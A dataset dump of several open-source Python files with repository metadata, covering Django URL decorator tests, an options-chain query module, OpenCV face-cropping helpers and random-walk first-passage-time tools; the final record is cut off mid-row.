blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f9638e5e882356a6a93dca5d028d3a860e22bdd4 | 12560bce3420db3ebd3377c3b107e985b61ff368 | /urldecorators/tests/tests.py | 34e4c88d7b4cff7fecb40dd1d4a7d97cd337ea18 | [
"BSD-3-Clause"
] | permissive | mila/django-urldecorators | 0c167b850e52d1227295d9d7ce442e78ef5cfeda | 1594fee73aff0269f4d2edd489f4653bb6746936 | refs/heads/master | 2021-07-16T23:55:15.465823 | 2021-02-28T11:13:38 | 2021-02-28T11:13:38 | 288,947 | 5 | 2 | BSD-3-Clause | 2021-02-28T11:15:38 | 2009-08-26T18:10:14 | Python | UTF-8 | Python | false | false | 13,106 | py |
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from urldecorators import url
from urldecorators.tests import views
__all__ = ["ResolverTestCase", "ConfigurationTestCase", "ViewTypesTestCase"]
class ResolverTestCase(TestCase):
def test_view_is_resolved(self):
r = self.client.get("/")
self.assertEqual((r.args, r.kwargs),((), {}))
def test_args_are_parsed(self):
r = self.client.get("/args/1/2/")
self.assertEqual((r.args, r.kwargs),(("1", "2"), {}))
def test_kwargs_are_parsed(self):
r = self.client.get("/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), ((), {"arg1":"1", "arg2":"2"}))
def test_included_view_is_resolved(self):
r = self.client.get("/inc/")
self.assertEqual((r.args, r.kwargs), ((), {}))
def test_included_args_are_parsed(self):
r = self.client.get("/inc/args/1/2/")
self.assertEqual((r.args, r.kwargs), (("1", "2"), {}))
def test_included_kwargs_are_parsed(self):
r = self.client.get("/inc/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
(), {"inc_arg1":"1", "inc_arg2":"2"}
))
def test_kwargs_are_merged(self):
r = self.client.get("/kwargs/1/2/inc/kwargs/3/4/")
self.assertEqual((r.args, r.kwargs), (
(), {"arg1":"1", "arg2":"2", "inc_arg1":"3", "inc_arg2":"4"}
))
def test_decorators_are_applied_to_url(self):
r = self.client.get("/decorators/")
self.assertEqual(
(r.args, r.kwargs),
(("decorator 1 applied", "decorator 2 applied"), {})
)
def test_args_are_parsed_for_decorated_url(self):
r = self.client.get("/decorators/args/1/2/")
self.assertEqual((r.args, r.kwargs), (
("1", "2", "decorator 1 applied", "decorator 2 applied"), {}
))
def test_kwargs_are_parsed_for_decorated_url(self):
r = self.client.get("/decorators/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"),
{"arg1":"1", "arg2":"2"}
))
def test_decorators_are_applied_to_include(self):
r = self.client.get("/decorators/inc/")
self.assertEqual((r.args, r.kwargs),(
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_args_are_parsed_for_decorated_include(self):
r = self.client.get("/decorators/inc/args/1/2/")
self.assertEqual((r.args, r.kwargs), (
("1", "2", "decorator 1 applied", "decorator 2 applied"), {}
))
def test_kwargs_are_parsed_for_decorated_include(self):
r = self.client.get("/decorators/inc/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"),
{"inc_arg1":"1", "inc_arg2":"2"}
))
def test_kwargs_are_merged_for_decorated_include(self):
r = self.client.get("/decorators/kwargs/1/2/inc/kwargs/3/4/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"),
{"arg1":"1", "arg2":"2", "inc_arg1":"3", "inc_arg2":"4"}
))
def test_decorators_are_applied_to_include_in_decorated_include(self):
r = self.client.get("/decorators/inc/inc/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_args_are_parsed_for_include_in_decorated_include(self):
r = self.client.get("/decorators/inc/inc/args/1/2/")
self.assertEqual((r.args, r.kwargs), (
("1", "2", "decorator 1 applied", "decorator 2 applied"), {}
))
def test_kwargs_are_parsed_for_include_in_decorated_include(self):
r = self.client.get("/decorators/inc/inc/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"),
{"inc_inc_arg1":"1", "inc_inc_arg2":"2"}
))
def test_middleware_is_applied_to_url(self):
r = self.client.get("/middleware/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_args_are_parsed_for_url_w_middleware(self):
r = self.client.get("/middleware/args/1/2/")
self.assertEqual((r.args, r.kwargs), (
("1", "2", "middleware 1 applied", "middleware 2 applied"), {}
))
def test_kwargs_are_parsed_for_url_w_middleware(self):
r = self.client.get("/middleware/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"),
{"arg1":"1", "arg2":"2"}
))
def test_middleware_is_applied_to_include(self):
r = self.client.get("/middleware/inc/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_args_are_parsed_for_include_w_middleware(self):
r = self.client.get("/middleware/inc/args/1/2/")
self.assertEqual((r.args, r.kwargs), (
("1", "2", "middleware 1 applied", "middleware 2 applied"), {}
))
def test_kwargs_are_parsed_for_include_w_middleware(self):
r = self.client.get("/middleware/inc/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"),
{"inc_arg1":"1", "inc_arg2":"2"}
))
def test_kwargs_are_merged_for_include_w_middleware(self):
r = self.client.get("/middleware/kwargs/1/2/inc/kwargs/3/4/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"),
{"arg1":"1", "arg2":"2", "inc_arg1":"3", "inc_arg2":"4"}
))
def test_middleware_is_applied_to_include_in_include_w_middleware(self):
r = self.client.get("/middleware/inc/inc/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_args_are_parsed_for_include_in_include_w_middleware(self):
r = self.client.get("/middleware/inc/inc/args/1/2/")
self.assertEqual((r.args, r.kwargs), (
("1", "2", "middleware 1 applied", "middleware 2 applied"), {}
))
def test_kwargs_are_parsed_for_include_in_include_w_middleware(self):
r = self.client.get("/middleware/inc/inc/kwargs/1/2/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"),
{"inc_inc_arg1":"1", "inc_inc_arg2":"2"}
))
def test_middleware_is_appliled_before_decorators_to_url(self):
r = self.client.get("/middleware-and-decorators/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied",
"decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_is_applied_before_decorators_to_include(self):
r = self.client.get("/middleware-and-decorators/inc/")
self.assertEqual( (r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied",
"decorator 1 applied", "decorator 2 applied"), {}
))
def test_include_w_middleware_in_decorated_include(self):
r = self.client.get("/decorators/inc/middleware/inc/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied",
"middleware 1 applied", "middleware 2 applied"), {}
))
def test_decorated_include_in_include_w_middleware(self):
r = self.client.get("/middleware/inc/decorators/inc/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied",
"decorator 1 applied", "decorator 2 applied"), {}
))
def test_url_w_middleware_in_decorated_include(self):
r = self.client.get("/decorators/inc/middleware/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied",
"middleware 1 applied", "middleware 2 applied"), {}
))
def test_decorated_url_in_include_w_middleware(self):
r = self.client.get("/middleware/inc/decorators/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied",
"decorator 1 applied", "decorator 2 applied"), {}
))
def test_decorators_work_with_namespaced_urls(self):
r = self.client.get("/namespace/decorators/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_works_with_namespaced_urls(self):
r = self.client.get("/namespace/middleware/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
class ConfigurationTestCase(TestCase):
def test_decorators_can_be_declared_as_string(self):
r = self.client.get("/string/decorators/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_can_be_declared_as_string(self):
r = self.client.get("/string/middleware/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_empty_string_as_view_name_raises(self):
def func():
urlpatterns = [
url(r'^$', '', decorators=["urldecorators.tests.urls.decorator1"]),
]
self.assertRaises(ImproperlyConfigured, func)
def test_unresolvable_decorator_name_raises(self):
def func():
urlpatterns = [
url(r'^$', views.sample_view, decorators=["does.not.exist"]),
]
self.assertRaises(ImproperlyConfigured, func)
def test_unresolvable_middleware_name_raises(self):
def func():
urlpatterns = [
url(r'^$', views.sample_view, middleware_classes=["does.not.exist"]),
]
self.assertRaises(ImproperlyConfigured, func)
def test_decorators_can_be_used_in_iterable_urlpatterns(self):
r = self.client.get("/attr/inc/decorators/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_can_be_used_in_iterable_urlpatterns(self):
r = self.client.get("/attr/inc/middleware/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_decorators_can_be_applied_to_iterable_url(self):
r = self.client.get("/attr/decorators/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_can_be_applied_to_iterable_url(self):
r = self.client.get("/attr/middleware/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
class ViewTypesTestCase(TestCase):
def test_decorators_work_with_func_view(self):
r = self.client.get("/decorators/inc/func/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_works_with_func_view(self):
r = self.client.get("/middleware/inc/func/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_decorators_work_with_class_view(self):
r = self.client.get("/decorators/inc/class/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_works_with_class_view(self):
r = self.client.get("/middleware/inc/class/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_decorators_work_with_method_view(self):
r = self.client.get("/decorators/inc/method/")
self.assertEqual((r.args, r.kwargs), (
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_works_with_method_view(self):
r = self.client.get("/middleware/inc/method/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
def test_decorators_work_with_generic_view(self):
r = self.client.get("/decorators/inc/generic/")
self.assertEqual((r.args, r.kwargs),(
("decorator 1 applied", "decorator 2 applied"), {}
))
def test_middleware_works_with_generic_view(self):
r = self.client.get("/middleware/inc/generic/")
self.assertEqual((r.args, r.kwargs), (
("middleware 1 applied", "middleware 2 applied"), {}
))
| [
"miloslav.pojman@gmail.com"
] | miloslav.pojman@gmail.com |
92f786936e34101e74491e1be18a6b873e6c9c03 | a1a7752ee2d39d0482eb4dfad3bfcbc8759cd38d | /09_Birthday_Cake_Candles.py | a901bf85ec2641ec50ace6097e13c7ee3fc15bde | [] | no_license | waditya/HackerRank_Algorithms_Warmup | 80a4d4923733a0ad4d8ebdd89c30b0bf5e905b1f | c74ee328ed2064fa97d57c3791c084d576238ddc | refs/heads/master | 2018-10-05T06:36:29.742956 | 2018-06-12T05:01:09 | 2018-06-12T05:01:09 | 115,484,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | #!/bin/python3
import sys
def birthdayCakeCandles(n, ar):
# Complete this function
max_length = len(ar)
max_element = max(ar)
#print(ar)
arr = []
ar.sort()
#print(ar)
arr.append(ar.index(max_element))
ctr = 0
for i in range(arr[0], max_length, 1):
#print(ar[i])
if ar[i] == max_element:
ctr = ctr + 1
else:
break
#print(ctr)
return(ctr)
n = int(input().strip())
ar = list(map(int, input().strip().split(' ')))
result = birthdayCakeCandles(n, ar)
print(result)
| [
"noreply@github.com"
] | waditya.noreply@github.com |
446bf97de636b97dbc926fceb6f46fb2256c7d67 | fd932ae47ec222fb69185032ac1ffc0fe99c7fa7 | /optopsy/option_queries.py | 81ebe5d15f7a88d8fa8464a978513861fa2841bd | [
"MIT"
] | permissive | forestzh/optopsy | e7833730047ed54afe942344f6ad2d5507a60a43 | 3a43f6c5382f2936a9ded3a43918a862cc0425f2 | refs/heads/master | 2020-04-04T23:11:42.481789 | 2018-11-03T20:12:18 | 2018-11-03T20:12:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,721 | py | """
The goal of this module is to abstract away dataframe manipulation
functions and provide an easy to use interface to query for specific
option legs in a dataframe. All functions will return a new pandas
dataframe to allow for method chaining
"""
from optopsy.enums import Period, OptionType
from optopsy.data import fields
CALCULATED_FIELDS = ['abs_dist', 'dte']
ALL_FIELDS = [f[0] for f in fields] + CALCULATED_FIELDS
NUMERIC_AND_DATE_FIELDS = [
f[0] for f in fields if (f[2] == 'numeric' or f[2] == 'date')
] + CALCULATED_FIELDS
# PRIVATE METHODS ========================================================
def _convert(val):
return val.value if isinstance(val, Period) else val
# QUERY METHODS ==========================================================
def calls(df):
"""
Filter the class' copy of the option chain for call options
"""
return df[df.option_type.str.lower().str.startswith('c')]
def puts(df):
"""
Filter the class' copy of the option chain for put options
"""
return df[df.option_type.str.lower().str.startswith('p')]
def opt_type(df, option_type):
"""
Filter the class' copy of the option chain for specified option type
"""
if isinstance(option_type, OptionType):
return df[df['option_type'] == option_type.value[0]]
else:
raise ValueError("option_type must be of type OptionType")
def underlying_price(df):
"""
Gets the underlying price info from the option chain if available
:return: The average of all underlying prices that may have been
recorded in the option chain for a given day. If no underlying
price column is defined, throw and error
"""
if 'underlying_price' in df:
dates = df['underlying_price'].unique()
return dates.mean()
else:
raise ValueError("Underlying Price column undefined!")
def nearest(df, column, val, tie='roundup', absolute=False):
"""
Returns dataframe rows containing the column item nearest to the
given value.
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values nearest to this param
:param tie: round up or down when nearest to value is at the midpoint of a range
:return: A new OptionQuery object with filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
if absolute:
data = df.assign(abs_dist=lambda r: abs(abs(r[column]) - _convert(val)))
else:
data = df.assign(abs_dist=lambda r: abs(r[column] - _convert(val)))
results = (
df
.assign(abs_dist=lambda r: abs(r[column] - _convert(val)))
.pipe(eq, 'abs_dist', data['abs_dist'].min())
.drop(['abs_dist'], axis=1)
)
if tie == 'roundup' and len(results) != 1:
return results[results[column] == results[column].max()]
elif tie == 'rounddown' and len(results) != 1:
return results[results[column] == results[column].min()]
else:
return results
else:
raise ValueError("Invalid column specified!")
def lte(df, column, val):
"""
Returns a dataframe with rows where column values are less than or
equals to the val parameter
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values less than or equals to this param
:return: A new OptionQuery object with filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
return df[df[column] <= _convert(val)]
else:
raise ValueError("Invalid column specified!")
def gte(df, column, val):
"""
Returns a dataframe with rows where column values are greater than or
equals to the val parameter
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values greater than or equals to this param
:return: A new OptionQuery object with filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
return df[df[column] >= _convert(val)]
else:
raise ValueError("Invalid column specified!")
def eq(df, column, val):
"""
Returns a dataframe with rows where column values are
equal to this param.
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values equals to this param amount
:return: A new OptionQuery object with filtered dataframe
"""
if column in ALL_FIELDS:
return df[df[column] == _convert(val)]
else:
raise ValueError("Invalid column specified!")
def lt(df, column, val):
"""
Returns a dataframe with rows where column values are
equal to this param.
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values less than this param amount
:return: A new OptionQuery object with filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
return df[df[column] < _convert(val)]
else:
raise ValueError("Invalid column specified!")
def gt(df, column, val):
"""
Returns a dataframe with rows where column values are
equal to this param.
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values greater than this param amount
:return: A new OptionQuery object with filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
return df[df[column] > _convert(val)]
else:
raise ValueError("Invalid column specified!")
def ne(df, column, val):
"""
Returns a dataframe with rows where column values are
equal to this param.
:param df: the dataframe to operate on
:param column: column to look up value
:param val: return values not equal to this param amount
:return: A new OptionQuery object with filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
return df[df[column] != _convert(val)]
else:
raise ValueError("Invalid column specified!")
def between(df, column, start, end, inclusive=True):
"""
Returns a dataframe with rows where column values are
equal to this param.
:param df: the dataframe to operate on
:param column: column to look up value
:param start: start of the range
:param end: end of the range
:param inclusive: include values specified in the comparison
:return: A filtered dataframe
"""
if column in NUMERIC_AND_DATE_FIELDS:
return df[df[column].between(
_convert(start), _convert(end), inclusive=inclusive)]
else:
raise ValueError("Invalid column specified!")
| [
"noreply@github.com"
] | forestzh.noreply@github.com |
87f0f9add2a04e3e9af9682fd44a9797e7e44232 | 53a78f4a484f44774aa6c8c252da57c3a129c87b | /scripts/utils.py | 0e9797fe366361ae70f6f2b2058fe75454f86d4f | [] | no_license | alexey-semikozov/sticker-face | bd482ffaba2447c366368004c9d62b2b0385552a | 6cc691dc87ca3d8ab32308aaabd542cb7b7b8d80 | refs/heads/master | 2020-04-14T13:36:17.549559 | 2019-03-09T13:36:54 | 2019-03-09T13:36:54 | 163,873,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,661 | py | import cv2
import numpy as np
from PIL import Image
import queue
import itertools as it #from more_itertools import chunked
def detect_faces(f_cascade, colored_img, scaleFactor = 1.1):
#just making a copy of image passed, so that passed image is not changed
img_copy = colored_img.copy()
#convert the test image to gray image as opencv face detector expects gray images
gray = cv2.cvtColor(img_copy, cv2.COLOR_BGR2GRAY)
#let's detect multiscale (some images may be closer to camera than others) images
faces = f_cascade.detectMultiScale(gray, scaleFactor=scaleFactor, minNeighbors=5)
#go over list of faces and draw them as rectangles on original colored img
for (x, y, w, h) in faces:
cv2.rectangle(img_copy, (x, y), (x+w, y+h), (0, 255, 0), 2)
return img_copy
# for one face on the image
def cut_face(f_cascade, colored_img, scaleFactor = 1.1):
#just making a copy of image passed, so that passed image is not changed
img_copy = colored_img.copy()
#convert the test image to gray image as opencv face detector expects gray images
gray = cv2.cvtColor(img_copy, cv2.COLOR_BGR2GRAY)
#let's detect multiscale (some images may be closer to camera than others) images
faces = f_cascade.detectMultiScale(gray, scaleFactor=scaleFactor, minNeighbors=5)
#go over list of faces and draw them as rectangles on original colored img
i = 0
for (x, y, w, h) in faces:
r = max(w, h) / 2
centerx = x + w / 2
centery = y + h / 2
nx = int(centerx - r)
ny = int(centery - r)
nr = int(r * 2)
faceimg = img_copy[ny:ny+nr, nx:nx+nr]
i += 1
# cv2.imwrite("image%d.jpg" % i, faceimg)
return faceimg
def edgedetect (channel):
sobelX = cv2.Sobel(channel, cv2.CV_16S, 1, 0)
sobelY = cv2.Sobel(channel, cv2.CV_16S, 0, 1)
sobel = np.hypot(sobelX, sobelY)
sobel[sobel > 255] = 255; # Some values seem to go above 255. However RGB channels has to be within 0-255
return sobel
def findSignificantContours (img, edgeImg):
contours, heirarchy = cv2.findContours(edgeImg, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Find level 1 contours
level1 = []
for i, tupl in enumerate(heirarchy[0]):
# Each array is in format (Next, Prev, First child, Parent)
# Filter the ones without parent
if tupl[3] == -1:
tupl = np.insert(tupl, 0, [i])
level1.append(tupl)
# From among them, find the contours with large surface area.
significant = []
tooSmall = edgeImg.size * 5 / 100 # If contour isn't covering 5% of total area of image then it probably is too small
for tupl in level1:
contour = contours[tupl[0]];
area = cv2.contourArea(contour)
if area > tooSmall:
significant.append([contour, area])
# Draw the contour on the original image
cv2.drawContours(img, [contour], 0, (0,255,0),2, cv2.LINE_AA, maxLevel=1)
significant.sort(key=lambda x: x[1])
#print ([x[1] for x in significant]);
return [x[0] for x in significant]
def scale_image(start_image, width = None, height = None):
w, h = start_image.size
if width and height:
max_size = (width, height)
elif width:
max_size = (width, h)
elif height:
max_size = (w, height)
else:
# No width or height specified
raise RuntimeError('Width or height required!')
start_image.thumbnail(max_size, Image.ANTIALIAS)
return start_image
# from habr blog post
def dijkstra(start_points, w):
d = np.zeros(w.shape) + np.infty
v = np.zeros(w.shape, dtype=np.bool)
q = queue.PriorityQueue()
for x, y in start_points:
d[x, y] = 0
q.put((d[x, y], (x, y)))
for x, y in it.product(range(w.shape[0]), range(w.shape[1])):
if np.isinf(d[x, y]):
q.put((d[x, y], (x, y)))
while not q.empty():
_, p = q.get()
if v[p]:
continue
neighbourhood = []
if p[0] - 1 >= 0:
neighbourhood.append((p[0] - 1, p[1]))
if p[0] + 1 <= w.shape[0] - 1:
neighbourhood.append((p[0] + 1, p[1]))
if p[1] - 1 >= 0:
neighbourhood.append((p[0], p[1] - 1))
if p[1] + 1 < w.shape[1]:
neighbourhood.append((p[0], p[1] + 1))
for x, y in neighbourhood:
# тут вычисляется расстояние
d_tmp = d[p] + np.abs(w[x, y] - w[p])
if d[x, y] > d_tmp:
d[x, y] = d_tmp
q.put((d[x, y], (x, y)))
v[p] = True
return d | [
"maxim_71rus_wow@mail.ru"
] | maxim_71rus_wow@mail.ru |
97edf149a1283818bdacab78f38e2d2fed9b5fdd | 5b5d164dcbbce48373d9b3c1e0476b8a49895363 | /pages/config/urls.py | ff71c59ece132e40edc18ce4e1dec33435bc05bc | [] | no_license | tay2001/pages-app | ecb32dcc9cf4a9861cf17fdbf4ba379fb1f6921c | 5243eb3830d44522135c1b7cd8c46522e1c99b3f | refs/heads/main | 2023-08-13T11:58:58.737312 | 2021-09-20T20:42:30 | 2021-09-20T20:42:30 | 407,016,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 815 | py | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('pages.urls')),
]
| [
"noreply@github.com"
] | tay2001.noreply@github.com |
a31ecbb74f5021e8c507af43755f93938fed2646 | e7405390a21ce92a62f5617095ddb5ed3a8ab358 | /theory/lvps/base_mtl.py | 05fede0be2e5904f5c973369d7a12ff2db235be6 | [] | no_license | joshnies/turring-theory | 4d6351150da1fed059053115ff9f1b2526a8826a | 4b3054fd27589e78e864dbd7f2a38735663d385d | refs/heads/main | 2023-07-31T05:45:30.137915 | 2021-09-26T17:09:59 | 2021-09-26T17:09:59 | 392,284,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | from theory.lvps.base_itl import ITL
from theory.veil import Veil
class MTL:
"""
Base Macro Translation Layer for translating multi-line blocks and portions of sequences.
Runs before the main neural network translation loop (including the ITL).
"""
def __init__(self, itl: ITL, veil: Veil):
"""
:param itl: ITL instance.
:param veil: Veil instance.
"""
self.itl = itl
self.veil = veil
def translate_all(self, file_contents: str) -> str:
"""
Perform all micro-translations.
:param file_contents: File contents.
:returns: New file contents.
"""
pass
| [
"50473759+joshnies@users.noreply.github.com"
] | 50473759+joshnies@users.noreply.github.com |
f280bb51f93e7bc63a275933bd72fc8600dfd195 | f4abbd3b8a7b0cdc37e87737a7e9f80d9550fbf5 | /nettools/fpttools.py | c0165cdf0414dbaa5821fb8e60550f9d6b6b24f7 | [] | no_license | rcortini/mybiotools | a4e2320d839fc3d68b58036c84cbf61c9eb4d759 | 1a8f424b9196e27e27338aa636c0199822925de9 | refs/heads/master | 2020-06-06T11:17:37.222575 | 2019-06-19T12:09:05 | 2019-06-19T12:09:05 | 192,725,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,624 | py | import numpy as np
from pathos.multiprocessing import ProcessingPool as Pool
from scipy.special import gamma, jv
from scipy.linalg import eig
from .random_walks import jump_to, row_normalize_matrix
from mybiotools import error_message
def FPT (P,startsite,endsite) :
"""
Returns the first passage time of a single search for 'endsite', starting
from 'startsite', on the row-normalized cumulative sum probability matrix
P. Caution: no check is performed on the sanity of P.
"""
site = startsite
t = 0
while site!=endsite :
site = jump_to(P[site])
t+=1
return t
def FPT_distribution (P,startsite,endsite,bins,
ntrials=None) :
"""
For the row-normalized cumulative sum probability matrix P, return the
first passage time distribution for random walks starting at 'startsite' and
ending at 'endsite'. Note that the bins of the distribution need to be
computed beforehand, and passed to the function.
Optional arguments:
- ntrials: number of FPTs to extract (default, N*10, where N is the
dimension of P
"""
if ntrials is None :
# number of nodes in the network
N = P.shape[0]
ntrials = N*10
fpt = np.zeros (ntrials)
for i in range (ntrials) :
fpt[i] = FPT (P,startsite,endsite)
return np.histogram (fpt,bins=bins,density=True)[0]
def GFPT (Q,target,bins,ntrials=None,nthreads=1) :
"""
Given the adjacency matrix Q, compute the global first passage time
distribution, that is, the first passage time distribution averaged over the
starting sites, with a weight that corresponds to the stationary
distribution. The bins of the distribution need to be supplied to the
function.
"""
N = Q.shape[0]
P = np.cumsum (row_normalize_matrix (Q),axis=1)
nbins = bins.shape[0]-1
fpt_startsite = np.zeros ((nbins,N))
if nthreads == 1 :
for i in xrange(N) :
if i == target : continue
fpt_startsite[:,i] = FPT_distribution(P,i,target,bins,ntrials)
else :
pool = Pool (nthreads)
def FPT_partial (i) :
return FPT_distribution(P,i,target,bins,ntrials)
fpt_map = pool.map (FPT_partial, range(N))
for i in xrange (N) :
fpt_startsite[:,i] = fpt_map [i]
W = np.sum (Q,axis=1)
W /= np.sum(W)
gfpt = np.sum (W*fpt_startsite,axis=1)
return gfpt
def MFPT (gfpt,bins) :
"""
Given the global mean first passage time distribution, together with the
bins for which it was calculated, return the mean. Note that we need this
function because the np.histogram function returns a probability density
which is not a mass function (i.e. its sum is not one), so that we need to
evaluate the spacing between the bins.
"""
x = np.array([0.5*(bins[i-1]+bins[i]) for i in range (1,len(bins))])
return np.sum(x*gfpt*np.ediff1d(bins))
def GFPT_theory (T,nu) :
"""
This function returns the theoretical GFPT distribution. Taken from
Benichou2011, equation 3. User should supply the values of the rescaled
times to compute, and the "nu" parameter, which is the ratio between the
fractal dimension and the walk dimension.
"""
if nu>=1 :
# non-compact case
return np.exp(-T)
else :
try :
import besselzeros
except ImportError :
error_message ("GFPT_theory","Could not import besselzeros module")
return np.zeros_like (T)
# compact case
nterms = 100
A = 2.0*(1-nu**2)/nu
ak = np.array([besselzeros.n(n,-nu) for n in xrange(1,nterms)])
jnu = jv(nu,ak)
j1_nu = jv(1.0-nu,ak)
gt = np.zeros_like(T)
for i,t in enumerate(T) :
sum_terms = np.power(ak,1.0-2.0*nu) * jnu/j1_nu * np.exp (-ak**2/A * t)
gt[i] = 2.0**(2.0*nu+1)/A * gamma(1.0+nu)/gamma(1.0-nu) * np.sum (sum_terms)
return gt
def GMFPT_theory (A,weighted=True) :
"""
According to the theory of Lin et al., 2012, the global mean first passage
time can be calculated by finding the eigenspectrum of the Laplacian matrix
of the graph. This function calculates the GMFPT from their formula, for the
graph described by the adjacency matrix A, to all sites. Optional parameter
'weighted' allows for the choice of having the same quantity but weighted
with the stationary distribution.
"""
N = A.shape[0]
d = np.sum(A,axis=1)
E = np.sum(d)/2.
L = np.diag(d) - A
L_eigs = eig(L)
sortidx = np.argsort(L_eigs[0])
l = np.array([L_eigs[0][i].real for i in sortidx])
v = np.array([L_eigs[1][:,i].real for i in sortidx])
T = np.zeros(N)
dv = np.dot (v,d)
if not weighted :
for j in xrange(N) :
for i in range(1,N) :
T[j] += 1.0/l[i] * (2*E*v[i,j]**2 - v[i,j]*dv[i])
return float(N)/(N-1.0) * T
else :
for j in xrange(N) :
for i in range(1,N) :
dvi = v[i,j]*dv[i]
T[j] += 1.0/l[i]*((2*E)**2*v[i,j]**2 - 2*v[i,j]*2*E*dvi - dvi**2)
return T/(2*E)
def extend_adjacency_matrix (A0,p_void) :
"""
This function takes the adjacency matrix 'A0' and adds a node to it. The
node represents a state that is equally probably reachable from any other
node, with probability 'p_void'.
"""
N = A0.shape[0]
A = np.zeros((N+1,N+1))
A[:N,:N] = A0
d_j = np.sum(A0,axis=1)
lambda_j = p_void * d_j / (1-p_void)
A[N,:-1] = lambda_j
A[:-1,N] = lambda_j
return A
| [
